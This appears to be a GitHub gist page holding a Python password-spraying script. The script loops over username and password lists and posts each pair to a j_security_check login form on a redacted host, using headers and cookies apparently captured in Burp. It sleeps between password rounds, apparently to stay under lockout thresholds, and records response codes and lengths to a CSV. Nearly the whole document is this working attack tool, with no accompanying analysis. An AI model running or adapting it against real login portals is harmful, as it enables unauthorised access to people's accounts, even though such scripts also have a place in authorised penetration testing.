Created
December 30, 2018 21:20
-
-
Save sdcampbell/86c25fa5ac1532a3f086764480479360 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import time | |
from datetime import datetime | |
usage = "usage: python3 passwordSpray.py [/path/to/usernames.file] [/path/to/passwords.file] [minutes between each password loop] [output filename (csv)]" | |
if len(sys.argv) != 5: | |
sys.exit(usage) | |
usernames = [line.rstrip('\n') for line in open(sys.argv[1])] | |
passwords = [line.rstrip('\n') for line in open(sys.argv[2])] | |
sleep_time = int(sys.argv[3]) * 60 | |
report_header = "Username,Password,ResponseCode,ResponseLength,Redirects\n" | |
with open(sys.argv[4], 'w') as csvfile: | |
csvfile.write(report_header) | |
burp0_url = "https://[redacted]:443/j_security_check" | |
burp0_cookies = {"buildNum": "100310", "showRefMsg": "false"} | |
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://[redacted]/j_security_check", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"} | |
for password in passwords: | |
report_output = [] | |
for username in usernames: | |
burp0_data={"j_username": username, "j_password": password, "browserLocale": "en_us", "domainName": "trust", "AUTHRULE_NAME": "ADAuthenticator", "buildNum": "100310", "clearCacheBuildNum": "100148"} | |
request = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) | |
report_output.append(f'{username},{password},{request.status_code},{len(request.content)},{len(request.history)}') | |
with open(sys.argv[4], 'a', newline='') as csvfile: | |
csvfile.write('\n'.join(report_output)) | |
print("Completed spraying with password: {}. Time: {}".format(password, datetime.now().time())) | |
print("Sleeping for {} minutes".format(sys.argv[3])) | |
time.sleep(sleep_time) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment